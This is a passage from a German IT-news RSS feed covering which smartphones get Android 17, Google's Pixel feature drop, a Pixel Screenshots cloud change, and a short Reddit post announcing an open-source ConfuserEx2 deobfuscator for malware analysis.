					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Vivo</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34e262c8ad8"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/Vivo-X300-Pro-hands-on-2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Vivo X300 Pro hands on 2" class="wp-image-2941609" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Der chinesische Smartphone-Hersteller Vivo kann eine Vielzahl von Modellen vorweisen, und einige davon bekommen voraussichtlich auch das Update auf Android 17:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3145865/vivo-x300-ultra-test.html" target="_blank" rel="noreferrer noopener">Vivo X300</a> / Pro / Ultra / FE</li>



<li>Vivo X200 / X200T Pro / FE </li>



<li>Vivo X100 / Pro</li>



<li>Vivo X Fold 5</li>



<li>Vivo X Fold 3 Pro</li>



<li>Vivo V70 / FE / Elite</li>



<li>Vivo V60 / V60e / V60 Lite </li>



<li>Vivo V50 / V50e / Lite </li>



<li>Vivo V40 / Pro</li>



<li>Vivo T4 / Pro / Ultra / Lite / T4x / T4R</li>



<li>Vivo Y400 / Pro / Pro+</li>



<li>Vivo Y300 GT / Y300t / Y300i</li>



<li>Vivo Y51 Pro</li>



<li>Vivo Y31d 4G</li>



<li>Vivo Y21 (2026)</li>



<li>Vivo Y11 (2026)</li>



<li>Vivo Y05 4G</li>



<li>Vivo Y29s 5G</li>
</ul>



<p><strong>Vivo X300 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

									<div class="price-comparison__record check_on_amazon">
							<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="amazon" loading="lazy">
															</div>
							<div class="price-comparison__price"></div>
							<div>
								<a class="price-comparison__view-button" href="https://www.amazon.de/s?k=Vivo+X300+Pro&amp;tag=pcwelt.de-21&amp;ascsubtag=rss">Bei Amazon ansehen</a>							</div>
						</div>
								
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Asus</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34e262cca36"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/Asus-zenphone.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Asus zenphone" class="wp-image-3036644" width="1200" height="544" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p></p>
</figcaption></figure><p class="imageCredit">Asus</p></div>



<p>Asus hat Anfang 2026 angekündigt, vorerst keine neuen Smartphones zu produzieren. Das heißt aber nicht, dass bereits bestehende Modelle keine Updates mehr erhalten.</p>



<p>Folgende Asus-Smartphones erhalten voraussichtlich das Update auf Android 17:</p>



<ul class="wp-block-list">
<li>ROG Phone 9 / <a href="https://www.pcwelt.de/article/2551760/asus-rog-phone-9-pro-test.html" target="_blank" rel="noreferrer noopener">9 Pro</a></li>



<li>ROG Phone 8 / <a href="https://www.pcwelt.de/article/2202783/asus-rog-phone-8-pro-test.html" target="_blank" rel="noreferrer noopener">8 Pro</a></li>



<li>Zenfone 12 Ultra</li>



<li>Zenfone 11 Ultra</li>
</ul>



<p><strong>Eher kein Android 17:</strong> ROG Phone 7, ROG Phone 7 Ultimate, Zenfone 10.</p>



<p><strong>Asus ROG Phone 9 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Asus</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://rog.asus.com/de/phones/rog-phone-9-pro/" data-vars-product-name="Asus ROG Phone 9 Pro" data-vars-product-id="2524258" data-vars-category="Smartphones" data-vars-manufacturer-id="11291" data-vars-manufacturer="Asus" data-vars-vendor="billiger,gtin,mpn,Asus" data-vars-po="billiger,gtin,mpn" data-product="2524258" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://rog.asus.com/de/phones/rog-phone-9-pro/" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Asus" aria-label="Deal anschauen bei Asus für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Was kann ich tun, wenn mein Gerät kein Android-Update mehr bekommt?</h2>



<p>Wenn Ihr Smartphone keine großen Android-Updates mehr erhält, ist das erst einmal kein Grund zur Panik. Hersteller liefern eine feste Anzahl an Updates aus, die neue Funktionen und Verbesserungen beinhalten. Darüber hinaus gibt es aber auch noch kleinere Updates sowie wichtige Sicherheits-Updates, die unabhängig vom Update auf Android 17 sind.</p>



<p>Sollte sich Ihr Gerät also nicht in der Liste der Modelle befinden, die Android 17 bekommen, prüfen Sie am besten gleich, ob es generell noch Support bekommt, damit Probleme und Sicherheitslücken weiterhin behoben werden. Sollte das nicht der Fall sein, können Sie über die Anschaffung eines <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">neuen Smartphones</a> nachdenken, oder Sie installieren ein <a href="https://www.pcwelt.de/article/2990255/beste-alternativen-zu-google-android.html" target="_blank" rel="noreferrer noopener">alternatives Betriebssystem</a>.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/3156260/ihr-android-handy-hat-ein-ablaufdatum-jetzt-herausfinden.html" target="_blank" rel="noreferrer noopener">Ihr Android-Handy hat ein Ablaufdatum: So finden Sie es heraus</a></p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub - Zypherion-Technologies/UnConfuserEx: A ConfuserEx2 deobfuscator with support for anti tamper, compressor, constants, control flow, and resource recovery.]]></title>
<description><![CDATA[UnConfuserEx is a fork of the original UnConfuserEx made by MadMin3r that improves support for newer ConfuserEx2 samples and a bunch of the protections that come with them. The original project already laid the groundwork for ConfuserEx2 deobfuscation, and this fork builds on that with better han...]]></description>
<link>https://tsecurity.de/de/3609122/malware-trojaner-viren/github-zypherion-technologiesunconfuserex-a-confuserex2-deobfuscator-with-support-for-anti-tamper-compressor-constants-control-flow-and-resource-recovery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609122/malware-trojaner-viren/github-zypherion-technologiesunconfuserex-a-confuserex2-deobfuscator-with-support-for-anti-tamper-compressor-constants-control-flow-and-resource-recovery/</guid>
<pubDate>Fri, 19 Jun 2026 02:02:53 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><a href="https://github.com/Zypherion-Technologies/UnConfuserEx">UnConfuserEx</a> is a fork of the original UnConfuserEx made by <a href="https://github.com/MadMin3r/UnconfuserEx">MadMin3r</a> that improves support for newer ConfuserEx2 samples and a bunch of the protections that come with them. The original project already laid the groundwork for ConfuserEx2 deobfuscation, and this fork builds on that with better handling for the stuff that tends to show up in real-world protected assemblies.</p> <p>It can deobfuscate things like <strong>anti-debug</strong>, <strong>anti-dump</strong>, <strong>anti-tamper</strong> (including normal, dynamic, and JIT-style variants), <strong>compressor stubs</strong>, <strong>constants</strong>, <strong>control flow</strong>, <strong>reference proxies</strong>, <strong>renamed symbols</strong>, <strong>resources</strong>, and some static cleanup using emulation as well. It also handles a few of the annoying edge cases like arithmetic constant expressions, switch/trampoline control flow, and embedded managed payloads.</p> <p>It is not a magic bullet, but it is a pretty solid upgrade over older public deobfuscators for samples that use those common ConfuserEx protection shapes.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/AhmedMinegames"> /u/AhmedMinegames </a> <br> <span><a href="https://github.com/Zypherion-Technologies/UnConfuserEx">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1u9mf5o/github_zypheriontechnologiesunconfuserex_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android 17 Drops For Pixel Phones and Watch]]></title>
<description><![CDATA[Google has begun rolling out Android 17, the June Pixel Feature Drop, and Wear OS 7 simultaneously across supported Pixel phones and watches. Highlights include floating app bubbles, improved foldable multitasking and gaming, tighter location and contact permissions, stronger lost-device protecti...]]></description>
<link>https://tsecurity.de/de/3608617/it-security-nachrichten/android-17-drops-for-pixel-phones-and-watch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608617/it-security-nachrichten/android-17-drops-for-pixel-phones-and-watch/</guid>
<pubDate>Thu, 18 Jun 2026 20:07:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google has begun rolling out Android 17, the June Pixel Feature Drop, and Wear OS 7 simultaneously across supported Pixel phones and watches. Highlights include floating app bubbles, improved foldable multitasking and gaming, tighter location and contact permissions, stronger lost-device protections, new Pixel AI tools, and up to 10% better Pixel Watch battery life. PhoneArena reports: Pixel owners are the clear winners, since everything here reaches Pixel first and a lot of it goes back to the Pixel 6. Fold owners get the most toys, with the Bubble Bar and foldable gaming mode built for the big screen. Watch wearers get the quietly important upgrade. Better battery and Live Updates make an everyday wearable easier to rely on, especially if you keep it on overnight. Google's latest Pixel Drop combines several AI-powered tools with a broader slate of Android 17 upgrades. Pixel owners gain Lyria 3 for generating music from text or images, Gemini Omni for creating custom video clips, enhanced call translation and screening, AirDrop-compatible Quick Share, expanded Magic Cue support, and conversational photo editing.
 
Android 17 builds on those additions with floating app Bubbles, selfie-camera Screen Reactions, and a split-screen gaming mode for foldables, while also strengthening privacy and security with more granular location and contact permissions, improved lost-device protection, tighter PIN-guessing limits, and enhanced threat detection.
 
Other additions include expanded parental controls, separate assistant volume and app memory settings, and an option to hide app names for greater privacy.
 
You can read more about everything new in Android 17 in Google's blog post.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Android+17+Drops+For+Pixel+Phones+and+Watch%3A+https%3A%2F%2Fmobile.slashdot.org%2Fstory%2F26%2F06%2F18%2F1733258%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fmobile.slashdot.org%2Fstory%2F26%2F06%2F18%2F1733258%2Fandroid-17-drops-for-pixel-phones-and-watch%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://mobile.slashdot.org/story/26/06/18/1733258/android-17-drops-for-pixel-phones-and-watch?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pixel-Smartphones: Screenshots werden jetzt auch in die Cloud gesendet – magische Analyse nicht nur lokal]]></title>
<description><![CDATA[Schon vor längerer Zeit wurde die Android-App Pixel Screenshots gestartet, die den Nutzern magische Funktionen zur Auswertung ihrer Bildschirmfotos bieten soll. Die darin enthaltenen Informationen sollten vollständig lokal ausgelesen und für die Gemini-KI verwendet werden - doch das ändert sich j...]]></description>
<link>https://tsecurity.de/de/3607468/it-nachrichten/pixel-smartphones-screenshots-werden-jetzt-auch-in-die-cloud-gesendet-magische-analyse-nicht-nur-lokal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607468/it-nachrichten/pixel-smartphones-screenshots-werden-jetzt-auch-in-die-cloud-gesendet-magische-analyse-nicht-nur-lokal/</guid>
<pubDate>Thu, 18 Jun 2026 13:05:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="363" src="https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-1024x580.jpg" class="attachment-large size-large wp-post-image" alt="pixel 9 magic" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-1024x580.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-300x170.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-768x435.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-640x362.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-800x453.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Schon vor längerer Zeit wurde die Android-App <a href="https://www.googlewatchblog.de/2025/03/pixel-screenshots-feature-drop-sorgt-fuer-ordnung-neue-bildschirmfotos-in-sammlungen-integrieren/"><strong>Pixel Screenshots</strong></a> gestartet, die den Nutzern magische Funktionen zur Auswertung ihrer Bildschirmfotos bieten soll. Die darin enthaltenen Informationen sollten vollständig lokal ausgelesen und für die Gemini-KI verwendet werden - doch das ändert sich jetzt. Im jüngsten Update der App ist von einer rein lokalen Analyse keine Rede mehr.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/06/pixel-smartphones-screenshots-werden-jetzt-auch-in-die-cloud-gesendet-magische-analyse-nicht-nur-lokal/">Pixel-Smartphones: Screenshots werden jetzt auch in die Cloud gesendet – magische Analyse nicht nur lokal</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/6308ebaa17744082ae9e83eadd544003"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/6308ebaa17744082ae9e83eadd544003" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/06/pixel-smartphones-screenshots-werden-jetzt-auch-in-die-cloud-gesendet-magische-analyse-nicht-nur-lokal/">Pixel-Smartphones: Screenshots werden jetzt auch in die Cloud gesendet – magische Analyse nicht nur lokal</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android 17: Diese Smartphones bekommen das Update]]></title>
<description><![CDATA[Android 17, das neueste Update von Googles Betriebssystem, ist endlich erschienen und bringt einige spannende Neuerungen für Android-Nutzer. Darunter neue Funktionen, verbesserte Sicherheit und vieles mehr.



Höchste Zeit also, zu prüfen, welche Smartphones das Upgrade auf die neue Version überh...]]></description>
<link>https://tsecurity.de/de/3606866/it-nachrichten/android-17-diese-smartphones-bekommen-das-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606866/it-nachrichten/android-17-diese-smartphones-bekommen-das-update/</guid>
<pubDate>Thu, 18 Jun 2026 09:02:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.pcwelt.de/article/2990238/android-17-release-features-update-2.html" target="_blank" rel="noreferrer noopener">Android 17</a>, das neueste Update von Googles Betriebssystem, <a href="https://www.pcwelt.de/article/3167761/android-17-ist-endlich-da-so-bekommen-sie-das-update.html" target="_blank" rel="noreferrer noopener">ist endlich erschienen</a> und bringt einige spannende Neuerungen für Android-Nutzer. Darunter neue Funktionen, verbesserte Sicherheit und vieles mehr.</p>



<p>Höchste Zeit also, zu prüfen, welche Smartphones das Upgrade auf die neue Version überhaupt erhalten! Welche Smartphones immer noch aktualisiert und auch mit <strong>Android 17 </strong>versorgt werden, verrät unsere Übersicht. Diese ist nach Marken sortiert und enthält auch Links zu unseren Testberichten der jeweiligen Modelle.</p>



<p>Da die Hersteller aktueller Smartphones <a href="https://www.pcwelt.de/article/2808830/ab-20-juni-2025-laengerer-support-fuer-smartphones.html" target="_blank" rel="noreferrer noopener">seit 2025</a> dazu verpflichtet sind, mindestens <strong>fünf Jahre </strong>lang Updates für ihre Geräte zu liefern, fällt die Liste recht ähnlich zu der von <a href="https://www.pcwelt.de/article/2814156/android-16-diese-smartphones-bekommen-das-update.html" target="_blank" rel="noreferrer noopener">Android 16</a> aus. Einige Geräte fliegen in diesem Jahr aber dennoch aus dem Update-Zyklus heraus (siehe <a href="https://www.pcwelt.de/article/3129020/android-17-diese-smartphones-bekommen-das-update-nicht-mehr.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update nicht mehr</a>).</p>



<p><em><strong>Hinweis:</strong> Einige Hersteller treffen klare Aussagen bezüglich der geplanten Update-Zeiträume ihrer Geräte. Andere halten sich nur grob an die EU-Richtlinie. Genießen Sie die Angaben also mit Vorsicht, denn spontan kann sich immer etwas ändern.</em></p>



<h2 class="wp-block-heading">Google</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3397cf008b3"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Google-Pixel-10a-review-3.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 10a review 3" class="wp-image-3078312" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Martin / Foundy</p></div>



<p>Google liefert bekanntlich als erstes Update auf Android 17, da es keine weiteren Anpassungen für die hauseigenen Pixel-Smartphones vornehmen muss. Der Rollout ist hier bereits gestartet. Durch die erweiterte Update-Garantie von Google fallen im Vergleich zu Android 16 auch keine Geräte raus.</p>



<p>Diese Google-Smartphones werden das Update auf Android 17 bekommen:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3065303/google-pixel-10a-vorgestellt-preis-erscheinungsdatum-farben-specs.html" target="_blank" rel="noreferrer noopener">Pixel 10a</a></li>



<li><a href="https://www.pcwelt.de/article/2921090/google-pixel-10-test.html" target="_blank" rel="noreferrer noopener">Pixel 10</a></li>



<li><a href="https://www.pcwelt.de/article/2894857/google-pixel-10-pro-test-2.html" target="_blank" rel="noreferrer noopener">Pixel 10 Pro</a></li>



<li>Pixel 10 Pro XL</li>



<li><a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank" rel="noreferrer noopener">Pixel 10 Pro Fold</a></li>



<li><a href="https://www.pcwelt.de/article/2687125/google-pixel-9a-test-2.html" target="_blank" rel="noreferrer noopener">Pixel 9a</a></li>



<li><a href="https://www.pcwelt.de/article/2434705/google-pixel-9-test.html" target="_blank" rel="noreferrer noopener">Pixel 9</a></li>



<li>Pixel 9 Pro</li>



<li><a href="https://www.pcwelt.de/article/2434665/google-pixel-9-pro-xl-testbericht.html" target="_blank" rel="noreferrer noopener">Pixel 9 Pro XL</a></li>



<li><a href="https://www.pcwelt.de/article/2434665/google-pixel-9-pro-xl-testbericht.html" target="_blank" rel="noreferrer noopener">Pixel 9 Pro Fold</a></li>



<li><a href="https://www.pcwelt.de/article/2111264/google-pixel-8-test.html" target="_blank" rel="noreferrer noopener">Pixel 8</a></li>



<li><a href="https://www.pcwelt.de/article/2103410/google-pixel-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pixel 8 Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2779688/google-pixel-8a-test.html" target="_blank" rel="noreferrer noopener">Pixel 8a</a></li>



<li><a href="https://www.pcwelt.de/article/1812910/google-pixel-7-test-smartphone.html" target="_blank" rel="noreferrer noopener">Pixel 7</a></li>



<li><a href="https://www.pcwelt.de/article/1352376/google-pixel-7-pro-im-test.html" target="_blank" rel="noreferrer noopener">Pixel 7 Pro</a></li>



<li><a href="https://www.pcwelt.de/article/1815523/google-pixel-7a-test.html" target="_blank" rel="noreferrer noopener">Pixel 7a</a></li>



<li><a href="https://www.pcwelt.de/article/1200502/google-pixel-6-im-test.html" target="_blank" rel="noreferrer noopener">Pixel 6</a></li>



<li><a href="https://www.pcwelt.de/article/1200514/google-pixel-6-pro-im-test-vertrautes-android-erlebnis-in-neuem-gewand.html" target="_blank" rel="noreferrer noopener">Pixel 6 Pro</a></li>



<li><a href="https://www.pcwelt.de/article/1206583/test-google-pixel-6a.html" target="_blank" rel="noreferrer noopener">Pixel 6a</a></li>
</ul>



<p><strong>Google Pixel 10 Pro XL im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>939,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0-wf3x6w5bMRDMrEUYsO-mzWIcpmOMot0xPOkMPEUMv5p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dt_XDLksSZSGDZtwn_8yKsuxZKjF1HtpC73Azvf-EPSrdsZLYOSPHIRjFOVFXHH32&amp;mid=685509711926&amp;id=685509711926&amp;ts=20260618&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro XL" data-vars-product-id="2885458" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885458" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0-wf3x6w5bMRDMrEUYsO-mzWIcpmOMot0xPOkMPEUMv5p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dt_XDLksSZSGDZtwn_8yKsuxZKjF1HtpC73Azvf-EPSrdsZLYOSPHIRjFOVFXHH32&amp;mid=685509711926&amp;id=685509711926&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="939,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 939,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.103,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=uPDfwxfr2XxRDMrEUYsO-lVt6WZAp33cX-XXQMqAo0B1g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt_XDLksSZSFpY0-EOCde7PJy4HCy7jhQJO-b31T0VW8&amp;mid=686106102329&amp;id=686106102329&amp;ts=20260618&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro XL" data-vars-product-id="2885458" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885458" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=uPDfwxfr2XxRDMrEUYsO-lVt6WZAp33cX-XXQMqAo0B1g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt_XDLksSZSFpY0-EOCde7PJy4HCy7jhQJO-b31T0VW8&amp;mid=686106102329&amp;id=686106102329&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.103,99 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.103,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Google</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
